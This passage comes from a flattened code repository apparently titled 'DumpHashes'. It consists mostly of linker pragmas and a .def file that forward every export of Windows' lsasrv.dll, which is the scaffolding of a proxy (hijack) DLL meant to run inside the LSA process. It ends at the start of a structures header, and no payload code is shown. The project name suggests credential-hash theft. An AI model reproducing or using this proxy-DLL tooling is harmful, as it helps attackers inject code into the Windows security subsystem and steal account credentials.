"/export:LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION=lsasrv.dll.LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION,@128") 88 | #pragma comment(linker, "/export:LsaIFree_LSA_FOREST_TRUST_INFORMATION=lsasrv.dll.LsaIFree_LSA_FOREST_TRUST_INFORMATION,@129") 89 | #pragma comment(linker, "/export:LsaIGetCallInfo=lsasrv.dll.LsaIGetCallInfo,@130") 90 | #pragma comment(linker, "/export:LsaIGetCcgClient=lsasrv.dll.LsaIGetCcgClient,@131") 91 | #pragma comment(linker, "/export:LsaIGetClientOsInfo=lsasrv.dll.LsaIGetClientOsInfo,@132") 92 | #pragma comment(linker, "/export:LsaIGetForestTrustInformation=lsasrv.dll.LsaIGetForestTrustInformation,@133") 93 | #pragma comment(linker, "/export:LsaIGetLogonGuid=lsasrv.dll.LsaIGetLogonGuid,@134") 94 | #pragma comment(linker, "/export:LsaIGetNameFromLuid=lsasrv.dll.LsaIGetNameFromLuid,@135") 95 | #pragma comment(linker, "/export:LsaIGetNbAndDnsDomainNames=lsasrv.dll.LsaIGetNbAndDnsDomainNames,@136") 96 | #pragma comment(linker, "/export:LsaIGetNego2Package=lsasrv.dll.LsaIGetNego2Package,@137") 97 | #pragma comment(linker, "/export:LsaIGetRemoteCredGuardLogonBuffer=lsasrv.dll.LsaIGetRemoteCredGuardLogonBuffer,@138") 98 | #pragma comment(linker, "/export:LsaIGetRemoteCredGuardSupplementalCreds=lsasrv.dll.LsaIGetRemoteCredGuardSupplementalCreds,@139") 99 | #pragma comment(linker, "/export:LsaIGetSiteName=lsasrv.dll.LsaIGetSiteName,@140") 100 | #pragma comment(linker, "/export:LsaIGetSupplementalTokenInfo=lsasrv.dll.LsaIGetSupplementalTokenInfo,@141") 101 | #pragma comment(linker, "/export:LsaIGetTokenInformationForLocalUser=lsasrv.dll.LsaIGetTokenInformationForLocalUser,@142") 102 | #pragma comment(linker, "/export:LsaIHealthCheck=lsasrv.dll.LsaIHealthCheck,@143") 103 | #pragma comment(linker, "/export:LsaIImpersonateClient=lsasrv.dll.LsaIImpersonateClient,@144") 104 | #pragma comment(linker, "/export:LsaIInitializeNetlogonFuncPtrs=lsasrv.dll.LsaIInitializeNetlogonFuncPtrs,@145") 105 | #pragma comment(linker, 
"/export:LsaIIsContainerized=lsasrv.dll.LsaIIsContainerized,@146") 106 | #pragma comment(linker, "/export:LsaIIsDomainWithinForest=lsasrv.dll.LsaIIsDomainWithinForest,@147") 107 | #pragma comment(linker, "/export:LsaIIsDsPaused=lsasrv.dll.LsaIIsDsPaused,@148") 108 | #pragma comment(linker, "/export:LsaIIsInEmulatedDomainJoinMode=lsasrv.dll.LsaIIsInEmulatedDomainJoinMode,@149") 109 | #pragma comment(linker, "/export:LsaIIsLastInteractiveLogonInfoEnabled=lsasrv.dll.LsaIIsLastInteractiveLogonInfoEnabled,@150") 110 | #pragma comment(linker, "/export:LsaIIsLocalHost=lsasrv.dll.LsaIIsLocalHost,@151") 111 | #pragma comment(linker, "/export:LsaIIsMachineSecureByDefault=lsasrv.dll.LsaIIsMachineSecureByDefault,@152") 112 | #pragma comment(linker, "/export:LsaIIsSuppressChannelBindingInfo=lsasrv.dll.LsaIIsSuppressChannelBindingInfo,@153") 113 | #pragma comment(linker, "/export:LsaIIsTargetPrivate=lsasrv.dll.LsaIIsTargetPrivate,@154") 114 | #pragma comment(linker, "/export:LsaIIsTrustedDomainsEnabled=lsasrv.dll.LsaIIsTrustedDomainsEnabled,@155") 115 | #pragma comment(linker, "/export:LsaIIsUserMSA=lsasrv.dll.LsaIIsUserMSA,@42") 116 | #pragma comment(linker, "/export:LsaIKerberosRegisterTrustNotification=lsasrv.dll.LsaIKerberosRegisterTrustNotification,@156") 117 | #pragma comment(linker, "/export:LsaILookupUserAccountType=lsasrv.dll.LsaILookupUserAccountType,@157") 118 | #pragma comment(linker, "/export:LsaILookupWellKnownName=lsasrv.dll.LsaILookupWellKnownName,@158") 119 | #pragma comment(linker, "/export:LsaIModifyPerformanceCounter=lsasrv.dll.LsaIModifyPerformanceCounter,@159") 120 | #pragma comment(linker, "/export:LsaINoConnectedUserPolicy=lsasrv.dll.LsaINoConnectedUserPolicy,@160") 121 | #pragma comment(linker, "/export:LsaINoMoreWin2KDomain=lsasrv.dll.LsaINoMoreWin2KDomain,@161") 122 | #pragma comment(linker, "/export:LsaINotifyChangeNotification=lsasrv.dll.LsaINotifyChangeNotification,@162") 123 | #pragma comment(linker, 
"/export:LsaINotifyGCStatusChange=lsasrv.dll.LsaINotifyGCStatusChange,@163") 124 | #pragma comment(linker, "/export:LsaINotifyNetlogonParametersChangeW=lsasrv.dll.LsaINotifyNetlogonParametersChangeW,@164") 125 | #pragma comment(linker, "/export:LsaINotifyNewPassword=lsasrv.dll.LsaINotifyNewPassword,@165") 126 | #pragma comment(linker, "/export:LsaINotifyPasswordChanged=lsasrv.dll.LsaINotifyPasswordChanged,@166") 127 | #pragma comment(linker, "/export:LsaIOpenPolicyTrusted=lsasrv.dll.LsaIOpenPolicyTrusted,@167") 128 | #pragma comment(linker, "/export:LsaIQueryForestTrustInfo=lsasrv.dll.LsaIQueryForestTrustInfo,@168") 129 | #pragma comment(linker, "/export:LsaIQueryForestTrustInformation=lsasrv.dll.LsaIQueryForestTrustInformation,@169") 130 | #pragma comment(linker, "/export:LsaIQueryInformationPolicyTrusted=lsasrv.dll.LsaIQueryInformationPolicyTrusted,@170") 131 | #pragma comment(linker, "/export:LsaIQueryPackageAttrInLogonSession=lsasrv.dll.LsaIQueryPackageAttrInLogonSession,@171") 132 | #pragma comment(linker, "/export:LsaIQuerySiteInfo=lsasrv.dll.LsaIQuerySiteInfo,@172") 133 | #pragma comment(linker, "/export:LsaIQuerySubnetInfo=lsasrv.dll.LsaIQuerySubnetInfo,@173") 134 | #pragma comment(linker, "/export:LsaIQueryUpnSuffixes=lsasrv.dll.LsaIQueryUpnSuffixes,@174") 135 | #pragma comment(linker, "/export:LsaIReferenceCredHandle=lsasrv.dll.LsaIReferenceCredHandle,@175") 136 | #pragma comment(linker, "/export:LsaIReferenceCtxtHandle=lsasrv.dll.LsaIReferenceCtxtHandle,@176") 137 | #pragma comment(linker, "/export:LsaIRegisterLogonSessionCallback=lsasrv.dll.LsaIRegisterLogonSessionCallback,@177") 138 | #pragma comment(linker, "/export:LsaIRegisterNotification=lsasrv.dll.LsaIRegisterNotification,@178") 139 | #pragma comment(linker, "/export:LsaIRegisterPolicyChangeNotificationCallback=lsasrv.dll.LsaIRegisterPolicyChangeNotificationCallback,@179") 140 | #pragma comment(linker, "/export:LsaIRenewCertificate=lsasrv.dll.LsaIRenewCertificate,@43") 141 | #pragma 
comment(linker, "/export:LsaIReplicateClientObject=lsasrv.dll.LsaIReplicateClientObject,@180") 142 | #pragma comment(linker, "/export:LsaIRetrieveCurrentUserSid=lsasrv.dll.LsaIRetrieveCurrentUserSid,@181") 143 | #pragma comment(linker, "/export:LsaISafeMode=lsasrv.dll.LsaISafeMode,@182") 144 | #pragma comment(linker, "/export:LsaISamIndicatedDsStarted=lsasrv.dll.LsaISamIndicatedDsStarted,@183") 145 | #pragma comment(linker, "/export:LsaISanitizeSAMName=lsasrv.dll.LsaISanitizeSAMName,@184") 146 | #pragma comment(linker, "/export:LsaISetClientDnsHostName=lsasrv.dll.LsaISetClientDnsHostName,@185") 147 | #pragma comment(linker, "/export:LsaISetLogonGuidInLogonSession=lsasrv.dll.LsaISetLogonGuidInLogonSession,@186") 148 | #pragma comment(linker, "/export:LsaISetLogonInfo=lsasrv.dll.LsaISetLogonInfo,@187") 149 | #pragma comment(linker, "/export:LsaISetNewSyskey=lsasrv.dll.LsaISetNewSyskey,@188") 150 | #pragma comment(linker, "/export:LsaISetPackageAttrInLogonSession=lsasrv.dll.LsaISetPackageAttrInLogonSession,@189") 151 | #pragma comment(linker, "/export:LsaISetSupplementalTokenInfo=lsasrv.dll.LsaISetSupplementalTokenInfo,@190") 152 | #pragma comment(linker, "/export:LsaISetTokenDacl=lsasrv.dll.LsaISetTokenDacl,@191") 153 | #pragma comment(linker, "/export:LsaISetUserFlags=lsasrv.dll.LsaISetUserFlags,@192") 154 | #pragma comment(linker, "/export:LsaITransformAuthorizationData=lsasrv.dll.LsaITransformAuthorizationData,@193") 155 | #pragma comment(linker, "/export:LsaIUnregisterAllPolicyChangeNotificationCallback=lsasrv.dll.LsaIUnregisterAllPolicyChangeNotificationCallback,@194") 156 | #pragma comment(linker, "/export:LsaIUnregisterLogonSessionCallback=lsasrv.dll.LsaIUnregisterLogonSessionCallback,@195") 157 | #pragma comment(linker, "/export:LsaIUnregisterPolicyChangeNotificationCallback=lsasrv.dll.LsaIUnregisterPolicyChangeNotificationCallback,@196") 158 | #pragma comment(linker, "/export:LsaIUpdateForestTrustInformation=lsasrv.dll.LsaIUpdateForestTrustInformation,@197") 
159 | #pragma comment(linker, "/export:LsaIUpdateKerbMaxTokenSize=lsasrv.dll.LsaIUpdateKerbMaxTokenSize,@198") 160 | #pragma comment(linker, "/export:LsaIUpdateLogonSession=lsasrv.dll.LsaIUpdateLogonSession,@199") 161 | #pragma comment(linker, "/export:LsaIValidateTargetInfo=lsasrv.dll.LsaIValidateTargetInfo,@200") 162 | #pragma comment(linker, "/export:LsaIVerifyCachability=lsasrv.dll.LsaIVerifyCachability,@201") 163 | #pragma comment(linker, "/export:LsaIVerifyCachabilityEx=lsasrv.dll.LsaIVerifyCachabilityEx,@202") 164 | #pragma comment(linker, "/export:LsaIWasLogonNotifiedOfProfileLoad=lsasrv.dll.LsaIWasLogonNotifiedOfProfileLoad,@203") 165 | #pragma comment(linker, "/export:LsaIWriteAuditEvent=lsasrv.dll.LsaIWriteAuditEvent,@204") 166 | #pragma comment(linker, "/export:LsaIWriteKdcAuthenticationEvent=lsasrv.dll.LsaIWriteKdcAuthenticationEvent,@205") 167 | #pragma comment(linker, "/export:LsaLookupPerfCounterAddAmount=lsasrv.dll.LsaLookupPerfCounterAddAmount,@44") 168 | #pragma comment(linker, "/export:LsaLookupPerfCounterAddLargeAmount=lsasrv.dll.LsaLookupPerfCounterAddLargeAmount,@45") 169 | #pragma comment(linker, "/export:LsaLookupPerfCounterDecrementCount=lsasrv.dll.LsaLookupPerfCounterDecrementCount,@46") 170 | #pragma comment(linker, "/export:LsaLookupPerfCounterDecrementLargeCount=lsasrv.dll.LsaLookupPerfCounterDecrementLargeCount,@47") 171 | #pragma comment(linker, "/export:LsaLookupPerfCounterIncrementCount=lsasrv.dll.LsaLookupPerfCounterIncrementCount,@48") 172 | #pragma comment(linker, "/export:LsaLookupPerfCounterIncrementLargeCount=lsasrv.dll.LsaLookupPerfCounterIncrementLargeCount,@49") 173 | #pragma comment(linker, "/export:LsapAdtGetCallerProcessInfo=lsasrv.dll.LsapAdtGetCallerProcessInfo,@206") 174 | #pragma comment(linker, "/export:LsapAdtWriteLog=lsasrv.dll.LsapAdtWriteLog,@207") 175 | #pragma comment(linker, "/export:LsapAllocateLsaHeap=lsasrv.dll.LsapAllocateLsaHeap,@208") 176 | #pragma comment(linker, 
"/export:LsapAllocatePrivateHeap=lsasrv.dll.LsapAllocatePrivateHeap,@209") 177 | #pragma comment(linker, "/export:LsapAuOpenSam=lsasrv.dll.LsapAuOpenSam,@210") 178 | #pragma comment(linker, "/export:LsapAuditFailed=lsasrv.dll.LsapAuditFailed,@211") 179 | #pragma comment(linker, "/export:LsapBuildPrivilegeAuditString=lsasrv.dll.LsapBuildPrivilegeAuditString,@212") 180 | #pragma comment(linker, "/export:LsapCheckBootMode=lsasrv.dll.LsapCheckBootMode,@213") 181 | #pragma comment(linker, "/export:LsapCloseHandle=lsasrv.dll.LsapCloseHandle,@214") 182 | #pragma comment(linker, "/export:LsapCompareDomainNames=lsasrv.dll.LsapCompareDomainNames,@215") 183 | #pragma comment(linker, "/export:LsapCrServerGetSessionKey=lsasrv.dll.LsapCrServerGetSessionKey,@216") 184 | #pragma comment(linker, "/export:LsapCrServerGetSessionKeySafe=lsasrv.dll.LsapCrServerGetSessionKeySafe,@217") 185 | #pragma comment(linker, "/export:LsapDbAcquireLockEx=lsasrv.dll.LsapDbAcquireLockEx,@218") 186 | #pragma comment(linker, "/export:LsapDbApplyTransaction=lsasrv.dll.LsapDbApplyTransaction,@219") 187 | #pragma comment(linker, "/export:LsapDbBuildObjectCaches=lsasrv.dll.LsapDbBuildObjectCaches,@220") 188 | #pragma comment(linker, "/export:LsapDbCloseHandle=lsasrv.dll.LsapDbCloseHandle,@221") 189 | #pragma comment(linker, "/export:LsapDbCloseObject=lsasrv.dll.LsapDbCloseObject,@222") 190 | #pragma comment(linker, "/export:LsapDbCopyUnicodeAttribute=lsasrv.dll.LsapDbCopyUnicodeAttribute,@223") 191 | #pragma comment(linker, "/export:LsapDbCopyUnicodeAttributeNoAlloc=lsasrv.dll.LsapDbCopyUnicodeAttributeNoAlloc,@224") 192 | #pragma comment(linker, "/export:LsapDbCreateObject=lsasrv.dll.LsapDbCreateObject,@225") 193 | #pragma comment(linker, "/export:LsapDbDeleteAttributesObject=lsasrv.dll.LsapDbDeleteAttributesObject,@226") 194 | #pragma comment(linker, "/export:LsapDbDeleteObject=lsasrv.dll.LsapDbDeleteObject,@227") 195 | #pragma comment(linker, 
"/export:LsapDbDereferenceHandle=lsasrv.dll.LsapDbDereferenceHandle,@228") 196 | #pragma comment(linker, "/export:LsapDbDereferenceObject=lsasrv.dll.LsapDbDereferenceObject,@229") 197 | #pragma comment(linker, "/export:LsapDbEnumerateSids=lsasrv.dll.LsapDbEnumerateSids,@230") 198 | #pragma comment(linker, "/export:LsapDbEnumerateTrustedDomainsEx=lsasrv.dll.LsapDbEnumerateTrustedDomainsEx,@231") 199 | #pragma comment(linker, "/export:LsapDbExpAcquireReadLockTrustedDomainList=lsasrv.dll.LsapDbExpAcquireReadLockTrustedDomainList,@232") 200 | #pragma comment(linker, "/export:LsapDbExpAcquireWriteLockTrustedDomainList=lsasrv.dll.LsapDbExpAcquireWriteLockTrustedDomainList,@233") 201 | #pragma comment(linker, "/export:LsapDbExpConvertReadLockTrustedDomainListToExclusive=lsasrv.dll.LsapDbExpConvertReadLockTrustedDomainListToExclusive,@234") 202 | #pragma comment(linker, "/export:LsapDbExpConvertWriteLockTrustedDomainListToShared=lsasrv.dll.LsapDbExpConvertWriteLockTrustedDomainListToShared,@235") 203 | #pragma comment(linker, "/export:LsapDbExpIsCacheBuilding=lsasrv.dll.LsapDbExpIsCacheBuilding,@236") 204 | #pragma comment(linker, "/export:LsapDbExpIsCacheValid=lsasrv.dll.LsapDbExpIsCacheValid,@237") 205 | #pragma comment(linker, "/export:LsapDbExpIsLockedTrustedDomainList=lsasrv.dll.LsapDbExpIsLockedTrustedDomainList,@238") 206 | #pragma comment(linker, "/export:LsapDbExpMakeCacheBuilding=lsasrv.dll.LsapDbExpMakeCacheBuilding,@239") 207 | #pragma comment(linker, "/export:LsapDbExpMakeCacheInvalid=lsasrv.dll.LsapDbExpMakeCacheInvalid,@240") 208 | #pragma comment(linker, "/export:LsapDbExpMakeCacheValid=lsasrv.dll.LsapDbExpMakeCacheValid,@241") 209 | #pragma comment(linker, "/export:LsapDbExpReleaseLockTrustedDomainList=lsasrv.dll.LsapDbExpReleaseLockTrustedDomainList,@242") 210 | #pragma comment(linker, "/export:LsapDbFreeAttributes=lsasrv.dll.LsapDbFreeAttributes,@243") 211 | #pragma comment(linker, 
"/export:LsapDbFreeTrustedDomainsEx=lsasrv.dll.LsapDbFreeTrustedDomainsEx,@244") 212 | #pragma comment(linker, "/export:LsapDbGetDbObjectTypeName=lsasrv.dll.LsapDbGetDbObjectTypeName,@245") 213 | #pragma comment(linker, "/export:LsapDbGetDbPolicyHandle=lsasrv.dll.LsapDbGetDbPolicyHandle,@246") 214 | #pragma comment(linker, "/export:LsapDbGetSecretType=lsasrv.dll.LsapDbGetSecretType,@247") 215 | #pragma comment(linker, "/export:LsapDbInitializeAttribute=lsasrv.dll.LsapDbInitializeAttribute,@248") 216 | #pragma comment(linker, "/export:LsapDbIsStatusConnectionFailure=lsasrv.dll.LsapDbIsStatusConnectionFailure,@249") 217 | #pragma comment(linker, "/export:LsapDbLookupAddListReferencedDomains=lsasrv.dll.LsapDbLookupAddListReferencedDomains,@250") 218 | #pragma comment(linker, "/export:LsapDbLookupCreateListReferencedDomains=lsasrv.dll.LsapDbLookupCreateListReferencedDomains,@251") 219 | #pragma comment(linker, "/export:LsapDbLookupGetDomainInfo=lsasrv.dll.LsapDbLookupGetDomainInfo,@252") 220 | #pragma comment(linker, "/export:LsapDbLookupListReferencedDomains=lsasrv.dll.LsapDbLookupListReferencedDomains,@253") 221 | #pragma comment(linker, "/export:LsapDbLookupMergeDisjointReferencedDomains=lsasrv.dll.LsapDbLookupMergeDisjointReferencedDomains,@254") 222 | #pragma comment(linker, "/export:LsapDbLookupNameChainRequest=lsasrv.dll.LsapDbLookupNameChainRequest,@255") 223 | #pragma comment(linker, "/export:LsapDbLookupNamesInPrimaryDomain=lsasrv.dll.LsapDbLookupNamesInPrimaryDomain,@256") 224 | #pragma comment(linker, "/export:LsapDbLookupSidsInPrimaryDomain=lsasrv.dll.LsapDbLookupSidsInPrimaryDomain,@257") 225 | #pragma comment(linker, "/export:LsapDbMakeGuidAttribute=lsasrv.dll.LsapDbMakeGuidAttribute,@258") 226 | #pragma comment(linker, "/export:LsapDbMakeSidAttribute=lsasrv.dll.LsapDbMakeSidAttribute,@259") 227 | #pragma comment(linker, "/export:LsapDbMakeUnicodeAttribute=lsasrv.dll.LsapDbMakeUnicodeAttribute,@260") 228 | #pragma comment(linker, 
"/export:LsapDbOpenObject=lsasrv.dll.LsapDbOpenObject,@261") 229 | #pragma comment(linker, "/export:LsapDbQueryInformationPolicy=lsasrv.dll.LsapDbQueryInformationPolicy,@262") 230 | #pragma comment(linker, "/export:LsapDbReadAttribute=lsasrv.dll.LsapDbReadAttribute,@263") 231 | #pragma comment(linker, "/export:LsapDbReadAttributesObject=lsasrv.dll.LsapDbReadAttributesObject,@264") 232 | #pragma comment(linker, "/export:LsapDbReferenceObject=lsasrv.dll.LsapDbReferenceObject,@265") 233 | #pragma comment(linker, "/export:LsapDbReleaseLockEx=lsasrv.dll.LsapDbReleaseLockEx,@266") 234 | #pragma comment(linker, "/export:LsapDbSecretIsMachineAcc=lsasrv.dll.LsapDbSecretIsMachineAcc,@267") 235 | #pragma comment(linker, "/export:LsapDbSidToLogicalNameObject=lsasrv.dll.LsapDbSidToLogicalNameObject,@268") 236 | #pragma comment(linker, "/export:LsapDbSlowEnumerateTrustedDomains=lsasrv.dll.LsapDbSlowEnumerateTrustedDomains,@269") 237 | #pragma comment(linker, "/export:LsapDbUpdateCountCompUnmappedNames=lsasrv.dll.LsapDbUpdateCountCompUnmappedNames,@270") 238 | #pragma comment(linker, "/export:LsapDbVerifyHandle=lsasrv.dll.LsapDbVerifyHandle,@271") 239 | #pragma comment(linker, "/export:LsapDbVerifyInfoQueryTrustedDomain=lsasrv.dll.LsapDbVerifyInfoQueryTrustedDomain,@272") 240 | #pragma comment(linker, "/export:LsapDbVerifyInfoSetTrustedDomain=lsasrv.dll.LsapDbVerifyInfoSetTrustedDomain,@273") 241 | #pragma comment(linker, "/export:LsapDbWriteAttributesObject=lsasrv.dll.LsapDbWriteAttributesObject,@274") 242 | #pragma comment(linker, "/export:LsapDomainRenameHandlerForLogonSessions=lsasrv.dll.LsapDomainRenameHandlerForLogonSessions,@275") 243 | #pragma comment(linker, "/export:LsapDsInitializeDsStateInfo=lsasrv.dll.LsapDsInitializeDsStateInfo,@276") 244 | #pragma comment(linker, "/export:LsapDsUnitializeDsStateInfo=lsasrv.dll.LsapDsUnitializeDsStateInfo,@277") 245 | #pragma comment(linker, 
"/export:LsapDssetupInitializeGetPrimaryDomainInformationOpState=lsasrv.dll.LsapDssetupInitializeGetPrimaryDomainInformationOpState,@278") 246 | #pragma comment(linker, "/export:LsapDuplicateSid=lsasrv.dll.LsapDuplicateSid,@279") 247 | #pragma comment(linker, "/export:LsapDuplicateString=lsasrv.dll.LsapDuplicateString,@280") 248 | #pragma comment(linker, "/export:LsapFreeLsaHeap=lsasrv.dll.LsapFreeLsaHeap,@281") 249 | #pragma comment(linker, "/export:LsapFreePrivateHeap=lsasrv.dll.LsapFreePrivateHeap,@282") 250 | #pragma comment(linker, "/export:LsapFreeString=lsasrv.dll.LsapFreeString,@283") 251 | #pragma comment(linker, "/export:LsapGetAccountDomainHandle=lsasrv.dll.LsapGetAccountDomainHandle,@284") 252 | #pragma comment(linker, "/export:LsapGetCapeNamesForCap=lsasrv.dll.LsapGetCapeNamesForCap,@285") 253 | #pragma comment(linker, "/export:LsapGetGlobalRestrictAnonymous=lsasrv.dll.LsapGetGlobalRestrictAnonymous,@286") 254 | #pragma comment(linker, "/export:LsapGetHourlyLogLevel=lsasrv.dll.LsapGetHourlyLogLevel,@287") 255 | #pragma comment(linker, "/export:LsapGetLogonSessionAccountInfoEx=lsasrv.dll.LsapGetLogonSessionAccountInfoEx,@288") 256 | #pragma comment(linker, "/export:LsapGetLookupRestrictIsolatedNameLevel=lsasrv.dll.LsapGetLookupRestrictIsolatedNameLevel,@289") 257 | #pragma comment(linker, "/export:LsapGetPolicyHandle=lsasrv.dll.LsapGetPolicyHandle,@290") 258 | #pragma comment(linker, "/export:LsapGetWellKnownSid=lsasrv.dll.LsapGetWellKnownSid,@291") 259 | #pragma comment(linker, "/export:LsapInitLsa=lsasrv.dll.LsapInitLsa,@292") 260 | #pragma comment(linker, "/export:LsapInitializeLsaDb=lsasrv.dll.LsapInitializeLsaDb,@293") 261 | #pragma comment(linker, "/export:LsapIsBuiltinDomain=lsasrv.dll.LsapIsBuiltinDomain,@294") 262 | #pragma comment(linker, "/export:LsapIsSamOpened=lsasrv.dll.LsapIsSamOpened,@295") 263 | #pragma comment(linker, "/export:LsapOpenSam=lsasrv.dll.LsapOpenSam,@296") 264 | #pragma comment(linker, 
"/export:LsapQueryClientInfo=lsasrv.dll.LsapQueryClientInfo,@297") 265 | #pragma comment(linker, "/export:LsapRemoveTrailingDot=lsasrv.dll.LsapRemoveTrailingDot,@298") 266 | #pragma comment(linker, "/export:LsapRpcCopySid=lsasrv.dll.LsapRpcCopySid,@299") 267 | #pragma comment(linker, "/export:LsapRpcCopyUnicodeString=lsasrv.dll.LsapRpcCopyUnicodeString,@300") 268 | #pragma comment(linker, "/export:LsapRtlValidateControllerTrustedDomain=lsasrv.dll.LsapRtlValidateControllerTrustedDomain,@301") 269 | #pragma comment(linker, "/export:LsapRtlValidateControllerTrustedDomainByHandle=lsasrv.dll.LsapRtlValidateControllerTrustedDomainByHandle,@302") 270 | #pragma comment(linker, "/export:LsapSetErrorInfo=lsasrv.dll.LsapSetErrorInfo,@303") 271 | #pragma comment(linker, "/export:LsapSidListSize=lsasrv.dll.LsapSidListSize,@304") 272 | #pragma comment(linker, "/export:LsapTraceEvent=lsasrv.dll.LsapTraceEvent,@305") 273 | #pragma comment(linker, "/export:LsapTraceEventWithData=lsasrv.dll.LsapTraceEventWithData,@306") 274 | #pragma comment(linker, "/export:LsapTruncateUnicodeString=lsasrv.dll.LsapTruncateUnicodeString,@307") 275 | #pragma comment(linker, "/export:LsarClose=lsasrv.dll.LsarClose,@308") 276 | #pragma comment(linker, "/export:LsarCreateSecret=lsasrv.dll.LsarCreateSecret,@309") 277 | #pragma comment(linker, "/export:LsarDeleteObject=lsasrv.dll.LsarDeleteObject,@310") 278 | #pragma comment(linker, "/export:LsarEnumerateTrustedDomainsEx=lsasrv.dll.LsarEnumerateTrustedDomainsEx,@311") 279 | #pragma comment(linker, "/export:LsarLookupSids=lsasrv.dll.LsarLookupSids,@312") 280 | #pragma comment(linker, "/export:LsarOpenPolicy=lsasrv.dll.LsarOpenPolicy,@313") 281 | #pragma comment(linker, "/export:LsarOpenSecret=lsasrv.dll.LsarOpenSecret,@314") 282 | #pragma comment(linker, "/export:LsarQueryDomainInformationPolicy=lsasrv.dll.LsarQueryDomainInformationPolicy,@315") 283 | #pragma comment(linker, "/export:LsarQueryInformationPolicy=lsasrv.dll.LsarQueryInformationPolicy,@316") 
284 | #pragma comment(linker, "/export:LsarQuerySecret=lsasrv.dll.LsarQuerySecret,@317") 285 | #pragma comment(linker, "/export:LsarQueryTrustedDomainInfoByName=lsasrv.dll.LsarQueryTrustedDomainInfoByName,@318") 286 | #pragma comment(linker, "/export:LsarRetrievePrivateData=lsasrv.dll.LsarRetrievePrivateData,@319") 287 | #pragma comment(linker, "/export:LsarSetInformationPolicy=lsasrv.dll.LsarSetInformationPolicy,@320") 288 | #pragma comment(linker, "/export:LsarSetSecret=lsasrv.dll.LsarSetSecret,@321") 289 | #pragma comment(linker, "/export:LsarSetTrustedDomainInfoByName=lsasrv.dll.LsarSetTrustedDomainInfoByName,@322") 290 | #pragma comment(linker, "/export:LsarStorePrivateData=lsasrv.dll.LsarStorePrivateData,@323") 291 | #pragma comment(linker, "/export:QueryLsaInterface=lsasrv.dll.QueryLsaInterface,@50") 292 | #pragma comment(linker, "/export:ServiceInit=lsasrv.dll.ServiceInit,@324") 293 | #pragma comment(linker, "/export:TracePrint=lsasrv.dll.TracePrint,@51") 294 | #pragma comment(linker, "/export:TracePrintCallerInformation=lsasrv.dll.TracePrintCallerInformation,@52") 295 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_DOMAIN_FULL_INFORMATION2=lsasrv.dll._fgs__LSAPR_TRUSTED_DOMAIN_FULL_INFORMATION2,@325") 296 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_DOMAIN_INFORMATION_EX2=lsasrv.dll._fgs__LSAPR_TRUSTED_DOMAIN_INFORMATION_EX2,@326") 297 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_ENUM_BUFFER=lsasrv.dll._fgs__LSAPR_TRUSTED_ENUM_BUFFER,@327") 298 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_ENUM_BUFFER_EX=lsasrv.dll._fgs__LSAPR_TRUSTED_ENUM_BUFFER_EX,@328") 299 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUST_INFORMATION=lsasrv.dll._fgs__LSAPR_TRUST_INFORMATION,@329") 300 | #pragma comment(linker, "/export:_fgu__LSAPR_TRUSTED_DOMAIN_INFO=lsasrv.dll._fgu__LSAPR_TRUSTED_DOMAIN_INFO,@330") 301 | 302 | -------------------------------------------------------------------------------- /DumpHashes/Source.def: 
-------------------------------------------------------------------------------- 1 | LIBRARY 2 | EXPORTS 3 | @1 = lsasrv.#1 @1 NONAME 4 | @2 = lsasrv.#2 @2 NONAME 5 | @3 = lsasrv.#3 @3 NONAME 6 | @4 = lsasrv.#4 @4 NONAME 7 | @5 = lsasrv.#5 @5 NONAME 8 | @6 = lsasrv.#6 @6 NONAME 9 | @7 = lsasrv.#7 @7 NONAME 10 | @8 = lsasrv.#8 @8 NONAME 11 | @9 = lsasrv.#9 @9 NONAME 12 | @10 = lsasrv.#10 @10 NONAME 13 | @11 = lsasrv.#11 @11 NONAME 14 | @12 = lsasrv.#12 @12 NONAME 15 | @13 = lsasrv.#13 @13 NONAME 16 | @14 = lsasrv.#14 @14 NONAME 17 | @15 = lsasrv.#15 @15 NONAME 18 | @16 = lsasrv.#16 @16 NONAME 19 | @17 = lsasrv.#17 @17 NONAME 20 | @18 = lsasrv.#18 @18 NONAME 21 | @19 = lsasrv.#19 @19 NONAME 22 | @20 = lsasrv.#20 @20 NONAME 23 | @21 = lsasrv.#21 @21 NONAME 24 | @22 = lsasrv.#22 @22 NONAME 25 | @23 = lsasrv.#23 @23 NONAME 26 | @24 = lsasrv.#24 @24 NONAME 27 | @25 = lsasrv.#25 @25 NONAME 28 | @26 = lsasrv.#26 @26 NONAME 29 | @27 = lsasrv.#27 @27 NONAME 30 | @28 = lsasrv.#28 @28 NONAME 31 | @29 = lsasrv.#29 @29 NONAME 32 | @30 = lsasrv.#30 @30 NONAME 33 | @31 = lsasrv.#31 @31 NONAME 34 | @32 = lsasrv.#32 @32 NONAME 35 | @33 = lsasrv.#33 @33 NONAME 36 | @34 = lsasrv.#34 @34 NONAME 37 | @35 = lsasrv.#35 @35 NONAME 38 | @36 = lsasrv.#36 @36 NONAME 39 | @37 = lsasrv.#37 @37 NONAME 40 | @38 = lsasrv.#38 @38 NONAME 41 | @39 = lsasrv.#39 @39 NONAME 42 | -------------------------------------------------------------------------------- /DumpHashes/Structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | #ifndef STRUCTS_H 5 | #define STRUCTS_H 6 | 7 | #include 8 | 9 | 10 | typedef struct _UNICODE_STRING { 11 | USHORT Length; 12 | USHORT MaximumLength; 13 | PWSTR Buffer; 14 | } UNICODE_STRING, * PUNICODE_STRING; 15 | 16 | typedef struct _STRING 17 | { 18 | USHORT Length; 19 | USHORT MaximumLength; 20 | PCHAR Buffer; 21 | } STRING, * PSTRING, ANSI_STRING, * PANSI_STRING, OEM_STRING, * POEM_STRING; 22 | 23 | 24 | typedef 
